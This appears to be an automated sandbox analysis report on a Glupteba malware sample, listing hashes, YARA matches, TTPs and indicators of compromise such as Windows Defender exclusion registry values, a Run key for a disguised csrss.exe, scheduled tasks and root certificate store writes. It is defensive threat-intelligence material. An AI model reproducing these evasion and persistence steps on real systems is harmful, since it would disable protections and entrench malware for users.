General
Target

6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe

Filesize

3MB

Completed

20-05-2022 22:29

Task

behavioral1

Score
10/10
MD5

c40e14338592240c54c328318963b3bb

SHA1

0026ef8f4f8baaeda070e1f306e2a7618a8b2e6d

SHA256

6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a

SHA256

292bb0075078174a848ee6a7ce74654bcfbdb1ba590461c9cc3203ae9d0286a5965c34ff6b317d05372e517238c504aeb0dc1ae9523ca6a311ec27c6583aab95

Malware Config
Signatures 18

Filter: none

Defense Evasion
Discovery
Persistence
  • Glupteba

    Description

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload

    Reported IOCs

    resourceyara_rule
    behavioral1/memory/1120-56-0x00000000027E0000-0x0000000002ED6000-memory.dmpfamily_glupteba
    behavioral1/memory/1120-57-0x0000000000400000-0x0000000000B10000-memory.dmpfamily_glupteba
    behavioral1/memory/1292-63-0x0000000000400000-0x0000000000B10000-memory.dmpfamily_glupteba
    behavioral1/memory/1764-70-0x0000000000400000-0x0000000000B10000-memory.dmpfamily_glupteba
  • Windows security bypass

    TTPs

    Disabling Security ToolsModify Registry
  • Executes dropped EXE
    csrss.exepatch.exe

    Reported IOCs

    pidprocess
    1764csrss.exe
    580patch.exe
    1384
  • Modifies Windows Firewall

    Tags

    TTPs

    Modify Existing Service
  • Loads dropped DLL
    6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exepatch.exe

    Reported IOCs

    pidprocess
    12926be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    12926be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    888
    580patch.exe
    580patch.exe
    580patch.exe
    580patch.exe
    580patch.exe
    1384
    580patch.exe
    580patch.exe
    580patch.exe
  • Windows security modification
    6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe

    TTPs

    Disabling Security ToolsModify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\58b266ea2548.exe = "0"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\58b266ea2548\58b266ea2548 = "0"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\MistySound = "0"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe = "0"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
  • Adds Run key to start application
    6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Windows\CurrentVersion\Run\MistySound = "\"C:\\Windows\\rss\\csrss.exe\""6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    Tags

    TTPs

    Query Registry
  • Modifies boot configuration data using bcdedit
    bcdedit.exe

    Reported IOCs

    pidprocess
    1412bcdedit.exe
  • Drops file in System32 directory
    csrss.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15Acsrss.exe
    File opened for modificationC:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15Acsrss.exe
    File opened for modificationC:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015csrss.exe
    File opened for modificationC:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015csrss.exe
    File opened for modificationC:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357csrss.exe
    File opened for modificationC:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357csrss.exe
  • Drops file in Windows directory
    makecab.exe6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe

    Reported IOCs

    descriptioniocprocess
    File createdC:\Windows\Logs\CBS\CbsPersist_20220521002659.cabmakecab.exe
    File opened for modificationC:\Windows\rss6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    File createdC:\Windows\rss\csrss.exe6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
  • Creates scheduled task(s)
    schtasks.exeschtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pidprocess
    1032schtasks.exe
    1216schtasks.exe
  • Modifies data under HKEY_USERS
    6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.execsrss.exenetsh.exe

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLscsrss.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trustcsrss.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"netsh.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLscsrss.exe
    Set value (data)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000netsh.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLscsrss.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CAcsrss.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"netsh.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificatescsrss.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificatescsrss.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLscsrss.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificatescsrss.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str)\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
  • Modifies system certificate store
    csrss.exe

    TTPs

    Install Root CertificateModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8csrss.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827csrss.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13csrss.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a